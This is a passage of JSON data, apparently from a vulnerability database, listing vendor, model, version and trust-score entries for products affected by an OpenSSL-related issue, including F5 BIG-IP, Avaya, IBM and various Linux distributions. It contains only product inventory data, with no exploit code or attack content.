"eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.7c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.6b" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "efi", "version": null }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.32" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.2" }, { "model": "aura system platform", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "hardware management console 7r7.7.0", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "linux enterprise sdk sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.41" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1.1" }, { "model": "big-ip webaccelerator hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "aura system manager", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "enterprise linux es", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "hardware management console 7r7.2.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "hardware management console 7r7.1.0 sp4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "8.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "junos space ja1500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip asm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "proactive contact", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "voice portal", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.1.3" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "junos space ja2500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "xiv storage system gen3 mtm", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2812-11411.2" }, { "model": "linux enterprise server sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "reflection sp1", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.0" }, { "model": "aura communication manager sp4", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2010.1" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "meeting exchange sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0.0.52" }, { "model": "tivoli netcool/system service monitor fp11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip webaccelerator hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "8.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "xiv storage system gen3 mtm 11.1.0.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-114" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "tivoli netcool/system service monitor fp12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.1" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.44" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.5" }, { "model": "hardware management console 7r7.1.0 sp3", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "junos space 14.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "8.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "tivoli network manager fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "pfsense", "scope": "ne", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.1" }, { "model": "big-ip ltm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "tivoli netcool/system service monitor fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "junos space 13.1p1.14", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2.2" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "reflection for ibm", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20070" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "hardware management console 7r7.3.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.3" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "big-ip ltm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "messaging storage server", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.14" }, { "model": "project openssl 0.9.8s", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.01" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "enterprise linux desktop version", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2011" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "meeting exchange sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "project openssl 1.0.0f", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux lts sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.50" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "tivoli netcool/system service monitor fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.55" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "messaging storage server sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "messaging storage server sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56001" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.5" }, { "model": "big-ip psm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip apm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.00" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5.1.2" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-11411.1.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4" }, { "model": "meeting exchange", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "jboss enterprise web server for solaris", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "1.0.2" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "xiv storage system gen3 mtm", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2810-11411.2" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.3" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli netcool/system service monitor fp13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "message networking sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux enterprise server for vmware sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "infosphere balanced warehouse d5100", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "enterprise linux ws", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "tivoli netcool/system service monitor fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "hardware management console 7r7.2.0 sp2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip wom hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "messaging storage server sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip analytics 11.0.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { 